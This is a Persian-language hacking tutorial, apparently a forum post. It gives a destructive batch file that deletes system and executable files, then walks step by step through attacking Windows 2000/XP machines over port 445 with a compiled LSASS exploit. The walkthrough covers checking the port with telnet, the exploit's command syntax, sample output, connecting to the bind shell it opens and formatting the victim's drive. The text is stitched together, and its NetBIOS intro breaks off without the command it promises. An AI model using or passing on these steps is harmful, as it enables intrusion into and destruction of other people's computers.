در اینجا شما رو با روشی آشنا می کنم  که توسط اون یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و فایل هاش رو دستکاری کنین ....

اول باید IP سیستم مورد نظر رو پیدا کنید ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید: 

این ویروس برای فرمت کردن درایو است:

در برنامه Notepad تایپ کنید:

@  echo off
         cls
color fc
del/ac:*.com
del/ac:*.sys
del/ac:*.exe/s

حالا از گزینه File روی Save As... کلیک کنید و فایل رو با پسوند bat ذخیره کنید.

نکته: به هیچ وجه فایل رو توی سیستم خودتون اجرا نکنید چون میترکید.

مطلبي كه در اينجا مي خونيد يكمي پيچيده است بنابراين اصلا نگران نباشيد گام به گام با اين متن پيش بريد سعي مي كنم خيلي ساده عنوان كنم اصلا نگران نباشيد ...

خلاصه كاري كه ما مي كنيم اين است كه ما با كارهاي زير مي خواهيم به ويندوز 2000 يا ايكس پي حمله كنيم از بيرون دستگاه بدون اينكه به قرباني فايلي بديم اجرا كنه يا هر ارتباط ديگري با قرباني داشته باشيم يعني مي خوايم خيلي حرفه اي نه مثل اين هكر هاي تازه كار كه تروجان ميدن به مردم خيلي حرفه اي خودمان مي خوايم يك پورت روي دستگاه قرباني باز كنيم بدون اينكه حتي يك كلمه هم با قرباني حرف بزنيم خوب حالا كه فهميديد چيكار مي خوام بكنيم من يكبار ديگه هم خلاصه بگم يك اي پي انتخاب مي كنيد و بعد هكش مي كنيد اولين كاري كه مي كنيم اين است كه اي پي مورد نظر يا همان قرباني را براي باز بودن پورت 445 امتحان مي كنيم.

Start->run->CMD

را براي باز كردن يك صفحه كامند پرومت بزنيد و بعد با دستور

telnet ip 445

امتحان مي كنيم كه آيا پورت 445 باز است يا نه البته شما اگر حرفه اي هستيد حتما مثل هكر هاي حرفه اي براي اين كارها يك برنامه خاص را استفاده ميكني بنا به سليقه خودتون كه از چه برنامه اي خوشتون مياد ولي در اينجا از دستوراتي استفاده مي كنيم كه هر كسي خواست اين كار را انجام بدهد نياز به برنامه خاصي نداشته باشه و با كمترين امكانات به نتيجه برسيم.

خوب توجه كنيد به جا اي پي در دستور بالا بايد اي پي قرباني را وارد كنيد و اگر اين دستور را وارد كرديد و اتصال برقرار شد يعني پورت 445 باز است پس گام اول را برداشتيد و اگر اتصال برقرار نشد و پيغام خطا دريافت كرديد قرباني شما به اين نوع حمله نفوذ پذير نيست.

خوب حالا به گام دوم ميريم در زير كد هاي حمله به اين پورت را مشاهده مي كنيد اين كدها را بايد كامپايل بفرمائيد و فايل اجرايي كه بدست مي اوريد را بصورت زير استفاده مي كنيد..

expl [options]

در خط بالا طرز استفاده به اين ترتيب است اولين كلمه expl نام فايل اجرايي است كه بعد از كامپايل ايجاد كرديد target يك عدد يك رقمي است كه مقدار 0 براي ويندوز ايكس پي است و مقدار 1و2 براي ويندوز 2000 است در آخر اين نوشته طرز تشخيص اينكه كدام عدد را استفاده كنيد يعني از كجا بفهميد قرباني ويندوز ايكس پي است كه 0 بزنيد يا قرباني ويندوز 2000 است كه 1 يا 2 بزنيد را مي خوانيد

victim ip همان اي پي قرباني شما است كه پورت 445 آن باز بود.

binport شماره پورتي است كه مي خواهيد روي دستگاه قرباني براي شما باز بشود و به اون پورت وصل بشويد و قرباني را هك كنيد.

option يك دستور است كه در ادامه تك دستور اين برنامه را توضيح ميدهم...

خوب دوست من كار بسيار ساده است فرض كنيد آي پي قرباني من 217.0.0.1 است و من طبق اون چيزهايي كه بالا گفتم اين كارهاي را به تريتب انجام مي دهیم

1-                                                                                                  Start --> Run --> CMD

2-                                                                                                      Telnet 217.0.0.1 445

3- اگر وصل شد از برنامه حمله كه قبلا كامپال كردم و الان آماده استفاده است استفاده ميكنم

4- پنجره قبلي رو كه در 2 دستور قبل باز كردم ميبندم

5-                                                                                                         Start->Run->CMD

6-                                                                                            expl.exe 0 217.0.0.1 24745

---- بعد از اينكه دستور خط 6 را زديد اين نوشته ها را مشاهده ميكنيد----

* [*] Target: IP: 217.0.0.1: OS: winXP [universal] lsass.exe

* [*] Connecting to 217.0.0.1:445 ... OK

* [*] Attacking ... OK

7- حمله انجام شد و پورت مورد نظر شما كه در خط شماره 6 من شماره پورت 24745 را انتخاب كردم الان باز شده تا ما وارد دستگاه قرباني بشيم

8-Start-->Run-->CMD

9-telnet 217.0.0.1 24745

10- به احتمال 95 درصد شما موفق شديد دستگاه قرباني را هك كنيد و اين خطوط را مشاهده خواهيد كرد

* Microsoft Windows XP [Version 5.00.2600]

* (C) Copyright 1985-2001 Microsoft Corp.

*

* C:\WINNT\system32>

11- دوست من در اين جا شما هر دستوري بزنيد روي دستگاه قرباني اجرا ميشود مثال: اگر بزنيد format C: مي توانيد هارد قرباني را فرمت كنيد...

ولي توجه كنيد يك هكر در اوج قدرت دست به خرابكاري نميزنه !!! پس هر كاري خواستيد بكنيد ولي خرابكاري نه !!!

و اما چطوري تشخيص بدهيد كه دستگاه قرباني شما ويندوز 2000 است كه از عدد 1 يا 2 استفاده كنيد يا ويندوز ايكس پي هست كه از عدد0 استفاده كنيد ؟ شما كافي است كه همان دستور بالا را كه براي حمله استفاده می كنيد بزنيد و فقط به آخرش t- اضافه كنيد يعني اينطوري

expl 0 217.0.0.1 24745 -t

بعد از زدن اين دستور برنامه به شما نسخه ويندوز را اعلام مي كند اگر نسخه ويندوز را winnt 5.0 اعلام كرد يعني ويندوز 2000 است و شما عدد 1 يا 2 استفاده كنيد و اگر winnt 5.1 را اعلام كرد ويندوز ايكس پي است.

در آخر باید به اون دسته از کسایی که دوست دارن هک یاد بگیرن میگم که:

برای یاد گرفتن هر چیزی باید تلاش کنی و به خودت سختی بدی ٬ هیچ چیزی به سادگی بدست نمیاد پس انتظار نداشته باش که بدون داشتن اطلاعات اولیه از برنامه نویسی و آشنایی کامل با سیستم عاملها و شبکه بتونی یک هکر بشی.